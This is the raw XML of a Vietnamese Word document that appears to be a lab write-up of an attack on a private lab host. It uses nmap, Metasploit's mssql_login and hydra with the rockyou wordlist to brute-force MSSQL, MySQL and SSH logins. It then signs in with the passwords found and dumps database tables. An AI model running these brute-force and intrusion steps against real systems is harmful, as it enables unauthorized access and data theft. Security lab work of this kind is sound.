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830F" w14:textId="39E4CC4C" w:rsidR="00FD3966" w:rsidRDefault="00FD3966" w:rsidP="00FD396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dụng Nmap : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3966">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>nmap -sV -O 192.168.233.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307D6B0" w14:textId="24D7629C" w:rsidR="00493A0A" w:rsidRPr="00493A0A" w:rsidRDefault="00493A0A" w:rsidP="00493A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93A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>sV: Xác định phiên bản của dịch vụ đang chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E5927" w14:textId="3F6A7B45" w:rsidR="00FD3966" w:rsidRPr="00493A0A" w:rsidRDefault="00493A0A" w:rsidP="00493A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93A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>O: Xác định hệ điều hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6079A" w14:textId="352CABFC" w:rsidR="00FD3966" w:rsidRDefault="00CE0EF2" w:rsidP="00FD396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E0EF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1A1DD48" wp14:editId="22E43144">
            <wp:extent cx="5943600" cy="395541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06F" w14:textId="7BD8E549" w:rsidR="00731FC1" w:rsidRDefault="00731FC1" w:rsidP="00FD396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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD53D1B" w14:textId="70951C7E" w:rsidR="00FD3966" w:rsidRDefault="00731FC1" w:rsidP="00731FC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31FC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37301C4" wp14:editId="0E177693">
            <wp:extent cx="3667637" cy="943107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33DD" w14:textId="67294D25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81768F" w14:textId="1FAE2EEF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84B3846" w14:textId="78BAD122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F6015C" w14:textId="459EF193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A6755B" w14:textId="75F125E8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F482D3E" w14:textId="4EFC7605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8D963D" w14:textId="72D8B6D0" w:rsidR="00B35D27" w:rsidRDefault="00B35D2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Có 3 cổng đang mở, tìm kiếm theo từ khóa + hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA32D5" w14:textId="593A7C52" w:rsidR="00B35D27" w:rsidRDefault="00C456E0" w:rsidP="00FE011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456E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Microsoft SQL Server hacktrick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C04B34" w14:textId="05E955D6" w:rsidR="00C456E0" w:rsidRDefault="00C456E0" w:rsidP="00C45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thư mục trong kali linux : </w:t>
      </w:r>
      <w:r w:rsidRPr="00C456E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/usr/share/wordlists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để giải nén file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C456E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7CA28C" w14:textId="1EC29F36" w:rsidR="00FD3966" w:rsidRPr="00C456E0" w:rsidRDefault="00C456E0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này chứa nhiều mật khẩu dễ đoán, người dùng hay sử dụng. giải nén xong ta được như dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043CB346" w14:textId="2B62A83F" w:rsidR="00FD3966" w:rsidRDefault="00C456E0" w:rsidP="00FD396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56E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FEF3E72" wp14:editId="0DFC6BD4">
            <wp:extent cx="5943600" cy="123571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3343" w14:textId="12720E95" w:rsidR="00C456E0" w:rsidRDefault="00C456E0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động Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA62E04" w14:textId="245CA4A8" w:rsidR="00C456E0" w:rsidRDefault="00C456E0" w:rsidP="00FD3966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C456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BFBDA1" wp14:editId="4EF83D83">
            <wp:extent cx="5943600" cy="38557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AF19" w14:textId="713BB9D8" w:rsidR="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00E063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module login để đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125813F" w14:textId="2AD9F5DB" w:rsidR="00C456E0" w:rsidRPr="00C456E0" w:rsidRDefault="00E063C7" w:rsidP="00E063C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/mssql/mssql_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5F693" w14:textId="29611BBA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717C80" w14:textId="55C1EA61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4967B4" w14:textId="7674C862" w:rsidR="00FD3966" w:rsidRDefault="00E063C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set cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F8B45" w14:textId="77777777" w:rsidR="00E063C7" w:rsidRPr="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00E063C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.233.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E7816" w14:textId="77777777" w:rsidR="00E063C7" w:rsidRPr="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00E063C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set RPORT 1433</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91A94D" w14:textId="77777777" w:rsidR="00E063C7" w:rsidRPr="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00E063C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set USERNAME sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79383EED" w14:textId="2518C97D" w:rsidR="00E063C7" w:rsidRPr="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00E063C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set PASS_FILE /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A127C0" w14:textId="61703C23" w:rsidR="00FD3966" w:rsidRDefault="00E063C7" w:rsidP="00FD396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063C7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6B93934" wp14:editId="0776538F">
            <wp:extent cx="5943600" cy="188087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47B" w14:textId="1129666D" w:rsidR="00E063C7" w:rsidRDefault="00E063C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sau đó gõ run để chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B3079" w14:textId="768E0CE1" w:rsidR="00E063C7" w:rsidRDefault="00E063C7" w:rsidP="00FD3966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E063C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27561B" wp14:editId="2B18EECE">
            <wp:extent cx="5943600" cy="46558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0ED8" w14:textId="2FF8031D" w:rsidR="00E063C7" w:rsidRDefault="00E063C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thử login với toàn bộ mật khẩu đã được lưu trong file rockyou.txt, khi đăng nhập được hệ thống sẽ dừng lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C4361" w14:textId="574B02D2" w:rsidR="001E7BF5" w:rsidRDefault="001E7BF5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trên cho thấy mật khẩu tìm được là : </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7BF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Passw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B81378" w14:textId="5C3FB4EB" w:rsidR="00456249" w:rsidRDefault="00456249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Xâm nhập vào cơ sở dữ liệu : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C8014" w14:textId="4382B65D" w:rsidR="00456249" w:rsidRPr="00CC466E" w:rsidRDefault="00456249" w:rsidP="00CC466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C466E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/opt/mssql-tools/bin/sqlcmd -S 192.168.233.147 -U sa -P Passw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AE561" w14:textId="2DA7D08C" w:rsidR="00456249" w:rsidRDefault="00456249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danh sách các bảng tồn tại :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70838F23" w14:textId="4B1741D4" w:rsidR="00456249" w:rsidRPr="00456249" w:rsidRDefault="00456249" w:rsidP="004562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56249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM information_schema.tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F863E0" w14:textId="69CB3324" w:rsidR="00456249" w:rsidRDefault="00456249" w:rsidP="004562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56249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375DFD8" w14:textId="6C0158ED" w:rsidR="00456249" w:rsidRDefault="00456249" w:rsidP="004562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dữ liệu 1 bảng bất kỳ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04582F18" w14:textId="71A4E269" w:rsidR="00456249" w:rsidRPr="00456249" w:rsidRDefault="00456249" w:rsidP="0045624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56249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM spt_values;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD703D" w14:textId="287C3CD9" w:rsidR="00456249" w:rsidRDefault="00456249" w:rsidP="0045624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56249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41372713" w14:textId="07A63BD6" w:rsidR="00FD6CA8" w:rsidRDefault="00FD6CA8" w:rsidP="00FD6CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F522C94" w14:textId="1E6AD5A4" w:rsidR="00FD6CA8" w:rsidRPr="00FD6CA8" w:rsidRDefault="00FD6CA8" w:rsidP="00FD6C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2D494" w14:textId="0392A489" w:rsidR="00297D75" w:rsidRDefault="00456249" w:rsidP="00FD3966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045624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D39675" wp14:editId="2562B874">
            <wp:extent cx="5943600" cy="28511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A59" w14:textId="5E4A8E03" w:rsidR="00FD6CA8" w:rsidRDefault="00FD6CA8" w:rsidP="00FD3966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D36E28D" w14:textId="45A18163" w:rsidR="001230C1" w:rsidRDefault="001230C1" w:rsidP="001230C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 Hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED9F16" w14:textId="142A2B2C" w:rsidR="001230C1" w:rsidRDefault="0066438E" w:rsidP="001230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hydra để quét mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C6FDB8" w14:textId="3C4768F1" w:rsidR="001C790A" w:rsidRPr="001C790A" w:rsidRDefault="001C790A" w:rsidP="001C790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C790A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.233.147 -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877A484" w14:textId="105A1197" w:rsidR="001C790A" w:rsidRDefault="001C790A" w:rsidP="001230C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C79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61835A" wp14:editId="350ECF0E">
            <wp:extent cx="5943600" cy="313118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FBBE" w14:textId="20920A12" w:rsidR="0066438E" w:rsidRPr="001230C1" w:rsidRDefault="001C790A" w:rsidP="001230C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C790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99270A" wp14:editId="7719C0E0">
            <wp:extent cx="5943600" cy="90043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51F1" w14:textId="16B21D3F" w:rsidR="00FD3966" w:rsidRDefault="00707E1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nhận được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18AC77" w14:textId="70B51FA1" w:rsidR="00707E17" w:rsidRDefault="00707E1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Quét được mật khẩu là : 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B4EC8" w14:textId="151B39B9" w:rsidR="00707E17" w:rsidRDefault="00707E17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vào mysql của máy ubuntu bằng mật khẩu 123 và khai thác dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082292D" w14:textId="697F2871" w:rsidR="00C72585" w:rsidRDefault="00144252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vào được database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F5576" w14:textId="75F36C40" w:rsidR="00144252" w:rsidRDefault="00144252" w:rsidP="00FD3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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168CD0C2" w14:textId="4F8EA352" w:rsidR="00144252" w:rsidRPr="00827B28" w:rsidRDefault="00144252" w:rsidP="00827B2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7B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SHOW DATABASES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C5622" w14:textId="56ED40C3" w:rsidR="00144252" w:rsidRPr="00827B28" w:rsidRDefault="00144252" w:rsidP="00827B2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7B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>USE VKUDB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A069AB" w14:textId="66DA6D80" w:rsidR="00144252" w:rsidRPr="00827B28" w:rsidRDefault="00144252" w:rsidP="00827B2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7B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SHOW TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7C095" w14:textId="0977D89A" w:rsidR="00144252" w:rsidRPr="00827B28" w:rsidRDefault="00144252" w:rsidP="00827B2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27B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM User;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED782B" w14:textId="765676DA" w:rsidR="00707E17" w:rsidRPr="00707E17" w:rsidRDefault="00707E17" w:rsidP="00FD3966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707E1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1A87BF" wp14:editId="00C6BCF3">
            <wp:extent cx="5943600" cy="70675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6C9B" w14:textId="6E4B485A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23A0ED" w14:textId="46E1843B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9AA6FF" w14:textId="4C055D20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4D28253" w14:textId="1E7D7DCD" w:rsidR="00FD3966" w:rsidRDefault="00A4457F" w:rsidP="00A4457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SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FDDF0" w14:textId="77777777" w:rsidR="00A4457F" w:rsidRPr="00A4457F" w:rsidRDefault="00A4457F" w:rsidP="00A4457F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F47C055" w14:textId="7C008CB0" w:rsidR="00FD3966" w:rsidRDefault="007F1BDA" w:rsidP="00FD396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F1BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.233.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49714FA2" w14:textId="1B08DF62" w:rsid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6E6ACC" w14:textId="77777777" w:rsidR="00FD3966" w:rsidRPr="00FD3966" w:rsidRDefault="00FD3966" w:rsidP="00FD396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D3966" w:rsidRPr="00FD3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E94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A120EC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112"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02E0B5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3287"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D224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134DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0A26C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20C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02E0B5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1E85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08108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A7138"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9544F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7491A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43C406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5D"/>
    <w:rsid w:val="00120126"/>
    <w:rsid w:val="001230C1"/>
    <w:rsid w:val="00144252"/>
    <w:rsid w:val="001C790A"/>
    <w:rsid w:val="001E7BF5"/>
    <w:rsid w:val="002763F2"/>
    <w:rsid w:val="00297D75"/>
    <w:rsid w:val="002D785D"/>
    <w:rsid w:val="00456249"/>
    <w:rsid w:val="00493A0A"/>
    <w:rsid w:val="004E3572"/>
    <w:rsid w:val="0066438E"/>
    <w:rsid w:val="00707E17"/>
    <w:rsid w:val="00731FC1"/>
    <w:rsid w:val="007B1CE7"/>
    <w:rsid w:val="007E0098"/>
    <w:rsid w:val="007F1BDA"/>
    <w:rsid w:val="00827B28"/>
    <w:rsid w:val="008C0354"/>
    <w:rsid w:val="00A4457F"/>
    <w:rsid w:val="00B35D27"/>
    <w:rsid w:val="00C4305D"/>
    <w:rsid w:val="00C456E0"/>
    <w:rsid w:val="00C72585"/>
    <w:rsid w:val="00CA41C2"/>
    <w:rsid w:val="00CC466E"/>
    <w:rsid w:val="00CE0EF2"/>
    <w:rsid w:val="00E063C7"/>
    <w:rsid w:val="00F168CD"/>
    <w:rsid w:val="00FB4EF4"/>
    <w:rsid w:val="00FD3966"/>
    <w:rsid w:val="00FD6CA8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5984"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3866A555-E64E-4448-B5FD-5A32FEDE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9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39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-09T09:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-13T11:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>